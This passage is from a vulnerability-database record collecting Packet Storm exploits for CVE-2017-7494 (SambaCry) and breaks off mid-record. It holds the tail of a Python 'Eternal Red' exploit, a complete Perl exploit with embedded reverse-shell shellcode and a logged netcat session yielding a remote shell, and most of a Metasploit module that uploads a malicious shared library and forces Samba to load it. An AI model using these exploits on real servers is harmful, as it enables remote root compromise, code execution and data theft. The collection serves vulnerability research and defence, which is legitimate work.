data_bytes[offset:offset+length*2-2].decode('UTF-16LE') \n \nif length % 2 != 0: \noffset += (length * 2 + 2) \nelse: \noffset += (length * 2) \n \nmax_length, _, length = struct.unpack('<III', data_bytes[offset:offset+12]) \noffset += 12 \nresults[i].comments = data_bytes[offset:offset+length*2-2].decode('UTF-16LE') \n \nif length % 2 != 0: \noffset += (length * 2 + 2) \nelse: \noffset += (length * 2) \n \nmax_length, _, length = struct.unpack('<III', data_bytes[offset:offset+12]) \noffset += 12 \nresults[i].path = data_bytes[offset:offset+length*2-2].decode('UTF-16LE') \n \nif length % 2 != 0: \noffset += (length * 2 + 2) \nelse: \noffset += (length * 2) \n \nmax_length, _, length = struct.unpack('<III', data_bytes[offset:offset+12]) \noffset += 12 \nresults[i].password = data_bytes[offset:offset+length*2-2].decode('UTF-16LE') \n \nif length % 2 
!= 0: \noffset += (length * 2 + 2) \nelse: \noffset += (length * 2) \n \n \ncloseFid(tid, fid) \ncallback(results) \n \ndef sendReadRequest(tid, fid, data_bytes): \nread_count = min(4280, self.max_read_size) \nm = SMB2Message(SMB2ReadRequest(fid, 0, read_count)) \nm.tid = tid \nself._sendSMBMessage(m) \nself.pending_requests[m.mid] = _PendingRequest(m.mid, int(time.time()) + timeout, readCB, errback, \nfid = fid, data_bytes = data_bytes) \n \ndef readCB(read_message, **kwargs): \nmessages_history.append(read_message) \nif read_message.status == 0: \ndata_len = read_message.payload.data_length \ndata_bytes = read_message.payload.data \n \nif data_bytes[3] & 0x02 == 0: \nsendReadRequest(read_message.tid, kwargs['fid'], kwargs['data_bytes'] + data_bytes[24:data_len-24]) \nelse: \ndecodeResults(read_message.tid, kwargs['fid'], kwargs['data_bytes'] + data_bytes[24:data_len-24]) \nelse: \ncloseFid(read_message.tid, kwargs['fid']) \nerrback(OperationFailure('Failed to list shares: Unable to retrieve shared device list', messages_history)) \n \ndef closeFid(tid, fid, results = None, error = None): \nm = SMB2Message(SMB2CloseRequest(fid)) \nm.tid = tid \nself._sendSMBMessage(m) \nself.pending_requests[m.mid] = _PendingRequest(m.mid, expiry_time, closeCB, errback, results = results, error = error) \nmessages_history.append(m) \n \ndef closeCB(close_message, **kwargs): \nif kwargs['results'] is not None: \ncallback(kwargs['results']) \nelif kwargs['error'] is not None: \nerrback(OperationFailure(kwargs['error'], messages_history)) \n \nif path not in self.connected_trees: \ndef connectCB(connect_message, **kwargs): \nmessages_history.append(connect_message) \nif connect_message.status == 0: \nself.connected_trees[path] = connect_message.tid \nconnectSrvSvc(connect_message.tid) \nelse: \nerrback(OperationFailure('Failed to list shares: Unable to connect to IPC$', messages_history)) \n \nm = SMB2Message(SMB2TreeConnectRequest(r'\\\\%s\\%s' % ( self.remote_name.upper(), path ))) 
\nself._sendSMBMessage(m) \nself.pending_requests[m.mid] = _PendingRequest(m.mid, expiry_time, connectCB, errback, path = path) \nmessages_history.append(m) \nelse: \nconnectSrvSvc(self.connected_trees[path]) \n \n \n# Don't convert to Window style path \ndef _retrieveFileFromOffset_SMB1Unix(self, service_name, path, file_obj, callback, errback, starting_offset, max_length, timeout = 30): \nif not self.has_authenticated: \nraise NotReadyError('SMB connection not authenticated') \n \nmessages_history = [ ] \n \n \ndef sendOpen(tid): \nm = SMBMessage(ComOpenAndxRequest(filename = path, \naccess_mode = 0x0040, # Sharing mode: Deny nothing to others \nopen_mode = 0x0001, # Failed if file does not exist \nsearch_attributes = SMB_FILE_ATTRIBUTE_HIDDEN | SMB_FILE_ATTRIBUTE_SYSTEM, \ntimeout = timeout * 1000)) \nm.tid = tid \nself._sendSMBMessage(m) \nself.pending_requests[m.mid] = _PendingRequest(m.mid, int(time.time()) + timeout, openCB, errback) \nmessages_history.append(m) \n \ndef openCB(open_message, **kwargs): \nmessages_history.append(open_message) \nif not open_message.status.hasError: \nif max_length == 0: \ncloseFid(open_message.tid, open_message.payload.fid) \ncallback(( file_obj, open_message.payload.file_attributes, 0 )) \nelse: \nsendRead(open_message.tid, open_message.payload.fid, starting_offset, open_message.payload.file_attributes, 0, max_length) \nelse: \nerrback(OperationFailure('Failed to retrieve %s on %s: Unable to open file' % ( path, service_name ), messages_history)) \n \ndef sendRead(tid, fid, offset, file_attributes, read_len, remaining_len): \nread_count = self.max_raw_size - 2 \nm = SMBMessage(ComReadAndxRequest(fid = fid, \noffset = offset, \nmax_return_bytes_count = read_count, \nmin_return_bytes_count = min(0xFFFF, read_count))) \nm.tid = tid \nself._sendSMBMessage(m) \nself.pending_requests[m.mid] = _PendingRequest(m.mid, int(time.time()) + timeout, readCB, errback, fid = fid, offset = offset, file_attributes = file_attributes, \nread_len 
= read_len, remaining_len = remaining_len) \n \ndef readCB(read_message, **kwargs): \n# To avoid crazy memory usage when retrieving large files, we do not save every read_message in messages_history. \nif not read_message.status.hasError: \nread_len = kwargs['read_len'] \nremaining_len = kwargs['remaining_len'] \ndata_len = read_message.payload.data_length \nif max_length > 0: \nif data_len > remaining_len: \nfile_obj.write(read_message.payload.data[:remaining_len]) \nread_len += remaining_len \nremaining_len = 0 \nelse: \nfile_obj.write(read_message.payload.data) \nremaining_len -= data_len \nread_len += data_len \nelse: \nfile_obj.write(read_message.payload.data) \nread_len += data_len \n \nif (max_length > 0 and remaining_len <= 0) or data_len < (self.max_raw_size - 2): \ncloseFid(read_message.tid, kwargs['fid']) \ncallback(( file_obj, kwargs['file_attributes'], read_len )) # Note that this is a tuple of 3-elements \nelse: \nsendRead(read_message.tid, kwargs['fid'], kwargs['offset']+data_len, kwargs['file_attributes'], read_len, remaining_len) \nelse: \nmessages_history.append(read_message) \ncloseFid(read_message.tid, kwargs['fid']) \nerrback(OperationFailure('Failed to retrieve %s on %s: Read failed' % ( path, service_name ), messages_history)) \n \ndef closeFid(tid, fid): \nm = SMBMessage(ComCloseRequest(fid)) \nm.tid = tid \nself._sendSMBMessage(m) \nmessages_history.append(m) \n \nif service_name not in self.connected_trees: \ndef connectCB(connect_message, **kwargs): \nmessages_history.append(connect_message) \nif not connect_message.status.hasError: \nself.connected_trees[service_name] = connect_message.tid \nsendOpen(connect_message.tid) \nelse: \nerrback(OperationFailure('Failed to retrieve %s on %s: Unable to connect to shared device' % ( path, service_name ), messages_history)) \n \nm = SMBMessage(ComTreeConnectAndxRequest(r'\\\\%s\\%s' % ( self.remote_name.upper(), service_name ), SERVICE_ANY, '')) \nself._sendSMBMessage(m) 
\nself.pending_requests[m.mid] = _PendingRequest(m.mid, int(time.time()) + timeout, connectCB, errback, path = service_name) \nmessages_history.append(m) \nelse: \nsendOpen(self.connected_trees[service_name]) \n \ndef get_connection(user, password, server, port, force_smb1=False): \nif force_smb1: \nsmb_structs.SUPPORT_SMB2 = False \n \nconn = SMBConnectionEx(user, password, \"\", \"server\") \nassert conn.connect(server, port) \nreturn conn \n \ndef get_share_info(conn): \nconn.hook_listShares() \nreturn conn.listShares() \n \ndef find_writeable_share(conn, shares): \nprint(\"[+] Searching for writable share\") \nfilename = \"red\" \ntest_file = tempfile.TemporaryFile() \nfor share in shares: \ntry: \n# If it's not writeable this will throw \nconn.storeFile(share.name, filename, test_file) \nconn.deleteFiles(share.name, filename) \nprint(\"[+] Found writeable share: \" + share.name) \nreturn share \nexcept: \npass \n \nreturn None \n \ndef write_payload(conn, share, payload, payload_name): \nwith open(payload, \"rb\") as fin: \nconn.storeFile(share.name, payload_name, fin) \n \nreturn True \n \ndef convert_share_path(share): \npath = share.path[2:] \npath = path.replace(\"\\\\\", \"/\") \nreturn path \n \ndef load_payload(user, password, server, port, fullpath): \nconn = get_connection(user, password, server, port, force_smb1 = True) \nconn.hook_retrieveFile() \n \nprint(\"[+] Attempting to load payload\") \ntemp_file = tempfile.TemporaryFile() \n \ntry: \nconn.retrieveFile(\"IPC$\", \"\\\\\\\\PIPE\\\\\" + fullpath, temp_file) \nexcept: \npass \n \nreturn \n \ndef drop_payload(user, password, server, port, payload): \npayload_name = \"charizard\" \n \nconn = get_connection(user, password, server, port) \nshares = get_share_info(conn) \nshare = find_writeable_share(conn, shares) \n \nif share is None: \nprint(\"[!] No writeable shares on \" + server + \" for user: \" + user) \nsys.exit(-1) \n \nif not write_payload(conn, share, payload, payload_name): \nprint(\"[!] 
Failed to write payload: \" + str(payload) + \" to server\") \nsys.exit(-1) \n \nconn.close() \n \nfullpath = convert_share_path(share) \nreturn os.path.join(fullpath, payload_name) \n \n \ndef main(): \nparser = argparse.ArgumentParser(formatter_class=argparse.RawDescriptionHelpFormatter, \ndescription= \"\"\"Eternal Red Samba Exploit -- CVE-2017-7494 \nCauses vulnerable Samba server to load a shared library in root context \nCredentials are not required if the server has a guest account \nFor remote exploit you must have write permissions to at least one share \nEternal Red will scan the Samba server for shares it can write to \nIt will also determine the fullpath of the remote share \n \nFor local exploit provide the full path to your shared library to load \n \nYour shared library should look something like this \n \nextern bool change_to_root_user(void); \nint samba_init_module(void) \n{ \nchange_to_root_user(); \n/* Do what thou wilt */ \n} \n\"\"\") \nparser.add_argument(\"payload\", help=\"path to shared library to load\", type=str) \nparser.add_argument(\"server\", help=\"Server to target\", type=str) \nparser.add_argument(\"-p\", \"--port\", help=\"Port to use defaults to 445\", type=int) \nparser.add_argument(\"-u\", \"--username\", help=\"Username to connect as defaults to nobody\", type=str) \nparser.add_argument(\"--password\", help=\"Password for user default is empty\", type=str) \nparser.add_argument(\"--local\", help=\"Perform local attack. Payload should be fullpath!\", type=bool) \nargs = parser.parse_args() \n \nif not os.path.isfile(args.payload): \nprint(\"[!] 
Unable to open: \" + args.payload) \nsys.exit(-1) \n \nport = 445 \nuser = \"nobody\" \npassword = \"\" \nfullpath = \"\" \n \nif args.port: \nport = args.port \nif args.username: \nuser = args.username \nif args.password: \npassword = args.password \n \nif args.local: \nfullpath = args.payload \nelse: \nfullpath = drop_payload(user, password, args.server, port, args.payload) \n \nload_payload(user, password, args.server, port, fullpath) \n \nif __name__ == \"__main__\": \nmain() \n \n`\n", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://packetstormsecurity.com/files/download/142657/samba360-exec.txt"}, {"lastseen": "2017-06-03T01:20:09", "description": "", "published": "2017-06-02T00:00:00", "type": "packetstorm", "title": "Samba is_known_pipename() Code Execution", "bulletinFamily": "exploit", "cvelist": ["CVE-2017-7494"], "modified": "2017-06-02T00:00:00", "id": "PACKETSTORM:142782", "href": "https://packetstormsecurity.com/files/142782/Samba-is_known_pipename-Code-Execution.html", "sourceData": "`#!/usr/bin/perl -w \n \n#Remote Samba is_known_pipename() ( 3.5.0 to 4.4.14, 4.5.10, and 4.6.4.) Exploit By N_A , N_A[at]tutanota.com \n \n#The orginal bug was discovered by steelo <knownsteelo[at]gmail.com> \n#CVE-2017-7494 \n#https://www.samba.org/samba/security/CVE-2017-7494.html \n \n#Tested on Samba 4.5.8-Debian \n \n \n#Requirments for this exploit to run: \n \n#perl -MCPAN -e 'install Filesys::SmbClientParser' \n#git clone https://github.com/CoreSecurity/impacket and then install the package \n \n \n \n#How to use this exploit: \n \n#This exploit loads a hacked library file into a vulnerable samba server and provides a reverse shell. ( you will need to swap the shellcode ) \n#A writable samba share is required or valid credentials to a samba share that allows write access to the share. \n#You need to know the server side location path of the writable share. 
For example if the share with write access is called 'blah' then you will \n#need to know the full server side path i.e '/home/billybobthornton/blah' \n#That is all. This exploit creates a hacked library file and loads it into the remote writable samba share and then uses the DCE/RPC protocol to \n#create a ncacn_np request to a named pipe ( the hacked library file ) and executes it. \n \n#The exploit uses the impacket library files by CoreSecurity to send the DCE/RPC packet. I have tried playing with Perl's DCE::Perl::RPC and did \n#not have much luck with this package. Its over 10 years old and i could not find any relevant documentation to aid me in creating a valid request \n#that would trigger a named pipe request. \n \n#If anyone knows an easier way to do this in Perl please contact me , even if its regarding wireshark captures of the DCE/RPC protocol. \n#Email me on N_A[at]tutanota.com, thank you :) \n \n \n \n#root@kali:~/exploits# perl NAsamba.pl -h 192.168.142.128 -s anonymous -l /home/NA/anonymous \n#[*]No Port Specified - Using Port 445 as default \n#[*]No user specified - Using 'nobody' as default user \n#[*]No password specified - Leaving password blank \n#[*]Using Host: 192.168.142.128 on port: 445 \n#[*]Username: nobody \n#[*]Password: \n#[*]Attacking Share: anonymous on Host: 192.168.142.128 Port: 445 \n#[*]Creating Pure Evil \n#[*]Evil File Created Successfully! \n#Domain=[WORKGROUP] OS=[Windows 6.1] Server=[Samba 4.5.8-Debian] \n#[*]Evil File transferred to Samba Server! \n#[*]Triggering exploit \n#[*]G0t r00t? \n \n \n \n \n#A terminal with a netcat listener set up on port 443 \n \n#root@kali:~/exploits# nc -nlvp 443 \n#listening on [any] 443 ... 
\n#connect to [192.168.142.140] from (UNKNOWN) [192.168.142.128] 36214 \n#sh -i; \n#sh: 0: can't access tty; job control turned off \n#$ id \n#uid=65534(nobody) gid=0(root) egid=65534(nogroup) groups=65534(nogroup) \n#$ \n \n \n \n \n \n#Greetz - Listen m0use i have been busy all week, didnt i tell i was working on stuff? Relax. R-E-L-A-X. Relaaaax. \n#Greetz to the Wu-tang clan and all killabeez ;P \n \n \n \n \n \nuse POSIX; \nuse Filesys::SmbClientParser; \nuse strict; \nuse warnings; \nuse Getopt::Long qw(GetOptions); \n \n \n \n#msfvenom -p linux/x86/shell_reverse_tcp LHOST=192.168.142.128 LPORT=443 -f c - change this to your own LHOST and LPORT to receive connection \n#And then replace the resultant shellcode below: \n#Note: Replace all double quotes \" in the shellcode with single quotes ' before replacing shellcode. \n \n \nmy $shellcode = '\\x31\\xdb\\xf7\\xe3\\x53\\x43\\x53\\x6a\\x02\\x89\\xe1\\xb0\\x66\\xcd\\x80'. \n'\\x93\\x59\\xb0\\x3f\\xcd\\x80\\x49\\x79\\xf9\\x68\\xc0\\xa8\\x8e\\x80\\x68'. \n'\\x02\\x00\\x01\\xbb\\x89\\xe1\\xb0\\x66\\x50\\x51\\x53\\xb3\\x03\\x89\\xe1'. \n'\\xcd\\x80\\x52\\x68\\x6e\\x2f\\x73\\x68\\x68\\x2f\\x2f\\x62\\x69\\x89\\xe3'. 
\n'\\x52\\x53\\x89\\xe1\\xb0\\x0b\\xcd\\x80'; \n \n \n#These are our evil files \nmy $evil_header =\"#ifndef evil_h__\\n\".\"#define evil_h__\\n\".\"extern int samba_init_module(void);\\n\".'#endif'; \nmy $evil =\"#include <stdio.h>\\n\".'int samba_init_module(void){ unsigned char shellcode[]='.'\"'.$shellcode.'\"'.\";\".'(*(void(*)()) shellcode)();return 0;}'; \n \nmy $evil_header_file = 'evil.h'; \nmy $evil_file = 'evil.c'; \n \n \n \n \n#creating evil library , libevil.so \nsub create_evil() \n{ \n \nopen(my $fh, '>', $evil_file) or die \"[*]Could not open evil.c\"; \nprint $fh $evil; \nopen($fh, '>', $evil_header_file) or die \"[*]Could not open evil.h\"; \nprint $fh $evil_header; \nclose $fh; \nsystem(\"gcc -c -Wall -Werror -fpic evil.c\"); \nsystem(\"gcc -shared -o libevil.so evil.o\"); \nprint \"[*]Evil File Created Successfully!\\n\"; \n} \n \n \nsub usage() \n{ \nprint \"\\n\\n-=[*]Remote Samba is_known_pipename() Root Exploit[*]=-\\n\\n\"; \nprint \"\\t\\t-=By N_A=-\\n\\n\"; \nprint \"[*]Usage: $0 --host hostname --port port --user user --password pass --share writable-share --location /server/side/path\\n\\n\"; \nprint \"[*]$0 --host 127.0.0.1 --port 445 --user nobody --password pass --share temp --location /home/blah/temp\\n\"; \nprint \"[*]$0 -h 127.0.0.1 -p 139 -u admin -pa adminpass -s stuff -l /var/samba/stuff\\n\\n\"; \nprint \"[*]Note: No username provided defaults to user name 'nobody'\\n\"; \nprint \"[*]Note: No port provided defaults to port '445'\\n\"; \nprint \"[*]Note: No password provided defaults to a blank password\\n\"; \nexit; \n} \n \n \nmy $host; #host to attack \nmy $port; #port on host to attack , default is 445 \nmy $user; #username on host to use, default is nobody \nmy $password; #password to use, default is left as blank \nmy $share; #path to the writable share to use \nmy $location; #this is the location on the server side of the share. 
We need this to access our libevil.so \n \n \nGetOptions('host|h=s' => \\$host, 'port|p=s' => \\$port,'user|u=s' => \\$user, 'password|pa=s' => \\$password, 'share|s=s' => \\$share, 'location|l=s' => \\$location,) or die usage(); \n \n \n \nif(!$location) \n{ \n \nusage(); \n} \n \nif(!$host) \n{ \n \nusage(); \n} \n \n \nif(!$port) \n{ \nprint \"[*]No Port Specified - Using Port 445 as default\\n\"; \n$port = 445; \n} \n \nif(!$user) \n{ \nprint \"[*]No user specified - Using 'nobody' as default user\\n\"; \n$user = \"nobody\"; \n} \n \nif(!$password) \n{ \nprint \"[*]No password specified - Leaving password blank\\n\"; \n$password = \"\"; \n} \n \n \nif(!$share) \n{ \nprint \"[*]Writable Share missing\\n\"; \nusage(); \n} \n \n \nmy $smb = new Filesys::SmbClientParser \n(undef, \n( \nuser => $user, \npassword => $password \n)); \n \n \n$smb->Host($host); \n \nprint \"[*]Using Host: $host on port: $port\\n\"; \nprint \"[*]Username: $user\\n\"; \nprint \"[*]Password: $password\\n\"; \nprint \"[*]Attacking Share: $share on Host: $host Port: $port\\n\"; \nprint \"[*]Creating Pure Evil\\n\"; \ncreate_evil(); \n \n$smb->Share($share); #Locating correct writable share \n \n$smb->put(\"libevil.so\"); #transferring libevil.so to the writeable share \nprint \"[*]Evil File transferred to Samba Server!\\n\"; \nprint \"[*]Triggering exploit\\n\"; \nprint \"[*]G0t r00t?\\n\"; \n \n#All should be well at this point. All thats left is to trigger the exploit. \n#A dirty hack below. There was not much documentation on DCE::Perl::RPC which is required to send requests to named pipes \n#Using impacket from the command line, via system() call. 
\n \nmy $evil_lib = '/libevil.so'; \nmy $stringbind = \"python -c 'from impacket.dcerpc.v5 import transport; st=\\\"$host\\\";stt=\\\"$location/libevil.so\\\";s=r\\\"ncacn_np:%s[\\\\pipe%s]\\\" % (st,stt); rpctrans = transport.DCERPCTransportFactory(s); dce = rpctrans.get_dce_rpc(); dce.connect();'\"; \n \n \nsystem(\"$stringbind\"); #triggering exploit \n`\n", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://packetstormsecurity.com/files/download/142782/NAsamba.pl.txt"}, {"lastseen": "2017-05-27T17:54:19", "description": "", "published": "2017-05-27T00:00:00", "type": "packetstorm", "title": "Samba is_known_pipename() Arbitrary Module Load", "bulletinFamily": "exploit", "cvelist": ["CVE-2017-7494"], "modified": "2017-05-27T00:00:00", "id": "PACKETSTORM:142715", "href": "https://packetstormsecurity.com/files/142715/Samba-is_known_pipename-Arbitrary-Module-Load.html", "sourceData": "`## \n# This module requires Metasploit: http://metasploit.com/download \n# Current source: https://github.com/rapid7/metasploit-framework \n## \n \nclass MetasploitModule < Msf::Exploit::Remote \nRank = ExcellentRanking \n \ninclude Msf::Exploit::Remote::DCERPC \ninclude Msf::Exploit::Remote::SMB::Client \n \ndef initialize(info = {}) \nsuper(update_info(info, \n'Name' => 'Samba is_known_pipename() Arbitrary Module Load', \n'Description' => %q{ \nThis module triggers an arbitrary shared library load vulnerability \nin Samba versions 3.5.0 to 4.4.14, 4.5.10, and 4.6.4. This module \nrequires valid credentials, a writeable folder in an accessible share, \nand knowledge of the server-side path of the writeable folder. In \nsome cases, anonymous access combined with common filesystem locations \ncan be used to automatically exploit this vulnerability. 
\n}, \n'Author' => \n[ \n'steelo <knownsteelo[at]gmail.com>', # Vulnerability Discovery \n'hdm', # Metasploit Module \n'Brendan Coles <bcoles[at]gmail.com>', # Check logic \n'Tavis Ormandy <taviso[at]google.com>', # PID hunting technique \n], \n'License' => MSF_LICENSE, \n'References' => \n[ \n[ 'CVE', '2017-7494' ], \n[ 'URL', 'https://www.samba.org/samba/security/CVE-2017-7494.html' ], \n], \n'Payload' => \n{ \n'Space' => 9000, \n'DisableNops' => true \n}, \n'Platform' => 'linux', \n# \n# Targets are currently limited by platforms with ELF-SO payload wrappers \n# \n'Targets' => \n[ \n \n[ 'Linux x86', { 'Arch' => ARCH_X86 } ], \n[ 'Linux x86_64', { 'Arch' => ARCH_X64 } ], \n# \n# Not ready yet \n# [ 'Linux ARM (LE)', { 'Arch' => ARCH_ARMLE } ], \n# [ 'Linux MIPS', { 'Arch' => MIPS } ], \n], \n'Privileged' => true, \n'DisclosureDate' => 'Mar 24 2017', \n'DefaultTarget' => 1)) \n \nregister_options( \n[ \nOptString.new('SMB_SHARE_NAME', [false, 'The name of the SMB share containing a writeable directory']), \nOptString.new('SMB_SHARE_BASE', [false, 'The remote filesystem path correlating with the SMB share name']), \nOptString.new('SMB_FOLDER', [false, 'The directory to use within the writeable SMB share']), \n]) \n \nregister_advanced_options( \n[ \nOptBool.new('BruteforcePID', [false, 'Attempt to use two connections to bruteforce the PID working directory', false]), \n]) \nend \n \n \ndef generate_common_locations \ncandidates = [] \nif datastore['SMB_SHARE_BASE'].to_s.length > 0 \ncandidates << datastore['SMB_SHARE_BASE'] \nend \n \n%W{ /volume1 /volume2 /volume3 /volume4 \n/shared /mnt /mnt/usb /media /mnt/media \n/var/samba /tmp /home /home/shared \n}.each do |base_name| \ncandidates << base_name \ncandidates << [base_name, @share] \ncandidates << [base_name, @share.downcase] \ncandidates << [base_name, @share.upcase] \ncandidates << [base_name, @share.capitalize] \ncandidates << [base_name, @share.gsub(\" \", \"_\")] \nend \n \ncandidates.uniq \nend \n \ndef 
enumerate_directories(share) \nbegin \nself.simple.connect(\"\\\\\\\\#{rhost}\\\\#{share}\") \nstuff = self.simple.client.find_first(\"\\\\*\") \ndirectories = [\"\"] \nstuff.each_pair do |entry,entry_attr| \nnext if %W{. ..}.include?(entry) \nnext unless entry_attr['type'] == 'D' \ndirectories << entry \nend \n \nreturn directories \n \nrescue ::Rex::Proto::SMB::Exceptions::ErrorCode => e \nvprint_error(\"Enum #{share}: #{e}\") \nreturn nil \n \nensure \nif self.simple.shares[\"\\\\\\\\#{rhost}\\\\#{share}\"] \nself.simple.disconnect(\"\\\\\\\\#{rhost}\\\\#{share}\") \nend \nend \nend \n \ndef verify_writeable_directory(share, directory=\"\") \nbegin \nself.simple.connect(\"\\\\\\\\#{rhost}\\\\#{share}\") \n \nrandom_filename = Rex::Text.rand_text_alpha(5)+\".txt\" \nfilename = directory.length == 0 ? \"\\\\#{random_filename}\" : \"\\\\#{directory}\\\\#{random_filename}\" \n \nwfd = simple.open(filename, 'rwct') \nwfd << Rex::Text.rand_text_alpha(8) \nwfd.close \n \nsimple.delete(filename) \nreturn true \n \nrescue ::Rex::Proto::SMB::Exceptions::ErrorCode => e \nvprint_error(\"Write #{share}#{filename}: #{e}\") \nreturn false \n \nensure \nif self.simple.shares[\"\\\\\\\\#{rhost}\\\\#{share}\"] \nself.simple.disconnect(\"\\\\\\\\#{rhost}\\\\#{share}\") \nend \nend \nend \n \ndef share_type(val) \n[ 'DISK', 'PRINTER', 'DEVICE', 'IPC', 'SPECIAL', 'TEMPORARY' ][val] \nend \n \ndef enumerate_shares_lanman \nshares = [] \nbegin \nres = self.simple.client.trans( \n\"\\\\PIPE\\\\LANMAN\", \n( \n[0x00].pack('v') + \n\"WrLeh\\x00\" + \n\"B13BWz\\x00\" + \n[0x01, 65406].pack(\"vv\") \n)) \nrescue ::Rex::Proto::SMB::Exceptions::ErrorCode => e \nvprint_error(\"Could not enumerate shares via LANMAN\") \nreturn [] \nend \nif res.nil? 
\nvprint_error(\"Could not enumerate shares via LANMAN\") \nreturn [] \nend \n \nlerror, lconv, lentries, lcount = res['Payload'].to_s[ \nres['Payload'].v['ParamOffset'], \nres['Payload'].v['ParamCount'] \n].unpack(\"v4\") \n \ndata = res['Payload'].to_s[ \nres['Payload'].v['DataOffset'], \nres['Payload'].v['DataCount'] \n] \n \n0.upto(lentries - 1) do |i| \nsname,tmp = data[(i * 20) + 0, 14].split(\"\\x00\") \nstype = data[(i * 20) + 14, 2].unpack('v')[0] \nscoff = data[(i * 20) + 16, 2].unpack('v')[0] \nscoff -= lconv if lconv != 0 \nscomm,tmp = data[scoff, data.length - scoff].split(\"\\x00\") \nshares << [ sname, share_type(stype), scomm] \nend \n \nshares \nend \n \ndef probe_module_path(path, simple_client=self.simple) \nbegin \nsimple_client.create_pipe(path) \nrescue Rex::Proto::SMB::Exceptions::ErrorCode => e \nvprint_error(\"Probe: #{path}: #{e}\") \nend \nend \n \ndef find_writeable_path(share) \nsubdirs = enumerate_directories(share) \nreturn unless subdirs \n \nif datastore['SMB_FOLDER'].to_s.length > 0 \nsubdirs.unshift(datastore['SMB_FOLDER']) \nend \n \nsubdirs.each do |subdir| \nnext unless verify_writeable_directory(share, subdir) \nreturn subdir \nend \n \nnil \nend \n \ndef find_writeable_share_path \n@path = nil \nshare_info = enumerate_shares_lanman \nif datastore['SMB_SHARE_NAME'].to_s.length > 0 \nshare_info.unshift [datastore['SMB_SHARE_NAME'], 'DISK', ''] \nend \n \nshare_info.each do |share| \nnext if share.first.upcase == 'IPC$' \nfound = find_writeable_path(share.first) \nnext unless found \n@share = share.first \n@path = found \nbreak \nend \nend \n \ndef find_writeable \nfind_writeable_share_path \nunless @share && @path \nprint_error(\"No suiteable share and path were found, try setting SMB_SHARE_NAME and SMB_FOLDER\") \nfail_with(Failure::NoTarget, \"No matching target\") \nend \nprint_status(\"Using location \\\\\\\\#{rhost}\\\\#{@share}\\\\#{@path} for the path\") \nend \n \ndef upload_payload \nbegin 
\nself.simple.connect(\"\\\\\\\\#{rhost}\\\\#{@share}\") \n \nrandom_filename = Rex::Text.rand_text_alpha(8)+\".so\" \nfilename = @path.length == 0 ? \"\\\\#{random_filename}\" : \"\\\\#{@path}\\\\#{random_filename}\" \nwfd = simple.open(filename, 'rwct') \nwfd << Msf::Util::EXE.to_executable_fmt(framework, target.arch, target.platform, \npayload.encoded, \"elf-so\", {:arch => target.arch, :platform => target.platform} \n) \nwfd.close \n \n@payload_name = random_filename \nreturn true \n \nrescue ::Rex::Proto::SMB::Exceptions::ErrorCode => e \nprint_error(\"Write #{@share}#{filename}: #{e}\") \nreturn false \n \nensure \nif self.simple.shares[\"\\\\\\\\#{rhost}\\\\#{@share}\"] \nself.simple.disconnect(\"\\\\\\\\#{rhost}\\\\#{@share}\") \nend \nend \nend \n \ndef find_payload \n \n# Reconnect to IPC$ \nsimple.connect(\"\\\\\\\\#{rhost}\\\\IPC$\") \n \n# Look for common paths first, since they can be a lot quicker than hunting PIDs \nprint_status(\"Hunting for payload using common path names: #{@payload_name} - //#{rhost}/#{@share}/#{@path}\") \ngenerate_common_locations.each do |location| \ntarget = [location, @path, @payload_name].join(\"/\").gsub(/\\/+/, '/') \nprint_status(\"Trying location #{target}...\") \nprobe_module_path(target) \nend \n \n# Exit early if we already have a session \nreturn if session_created? \n \nreturn unless datastore['BruteforcePID'] \n \n# XXX: This technique doesn't seem to work in practice, as both processes have setuid()d \n# to non-root, but their /proc/pid directories are still owned by root. Trying to \n# read the /proc/other-pid/cwd/target.so results in permission denied. There is a \n# good chance that this still works on some embedded systems and odd-ball Linux. 
\n \n# Use the PID hunting strategy devised by Tavis Ormandy \nprint_status(\"Hunting for payload using PID search: #{@payload_name} - //#{rhost}/#{@share}/#{@path} (UNLIKELY TO WORK!)\") \n \n# Configure the main connection to have a working directory of the file share \nsimple.connect(\"\\\\\\\\#{rhost}\\\\#{@share}\") \n \n# Use a second connection to brute force the PID of the first connection \nprobe_conn = connect(false) \nsmb_login(probe_conn) \nprobe_conn.connect(\"\\\\\\\\#{rhost}\\\\#{@share}\") \nprobe_conn.connect(\"\\\\\\\\#{rhost}\\\\IPC$\") \n \n# Run from 2 to MAX_PID (ushort) trying to read the other process CWD \n2.upto(32768) do |pid| \n \n# Look for the PID associated with our main SMB connection \ntarget = [\"/proc/#{pid}/cwd\", @path, @payload_name].join(\"/\").gsub(/\\/+/, '/') \nvprint_status(\"Trying PID with target path #{target}...\") \nprobe_module_path(target, probe_conn) \n \n# Keep our main connection alive \nif pid % 1000 == 0 \nself.simple.client.find_first(\"\\\\*\") \nend \nend \n \nend \n \ndef check \nres = smb_fingerprint \n \nunless res['native_lm'] =~ /Samba ([\\d\\.]+)/ \nprint_error(\"does not appear to be Samba: #{res['os']} / #{res['native_lm']}\") \nreturn CheckCode::Safe \nend \n \nsamba_version = Gem::Version.new($1.gsub(/\\.$/, '')) \n \nvprint_status(\"Samba version identified as #{samba_version.to_s}\") \n \nif samba_version < Gem::Version.new('3.5.0') \nreturn CheckCode::Safe \nend \n \n# Patched in 4.4.14 \nif samba_version < Gem::Version.new('4.5.0') && \nsamba_version >= Gem::Version.new('4.4.14') \nreturn CheckCode::Safe \nend \n \n# Patched in 4.5.10 \nif samba_version > Gem::Version.new('4.5.0') && \nsamba_version < Gem::Version.new('4.6.0') && \nsamba_version >= Gem::Version.new('4.5.10') \nreturn CheckCode::Safe \nend \n \n# Patched in 4.6.4 \nif samba_version >= Gem::Version.new('4.6.4') \nreturn CheckCode::Safe \nend \n \nconnect \nsmb_login \nfind_writeable_share_path \ndisconnect \n \nif 
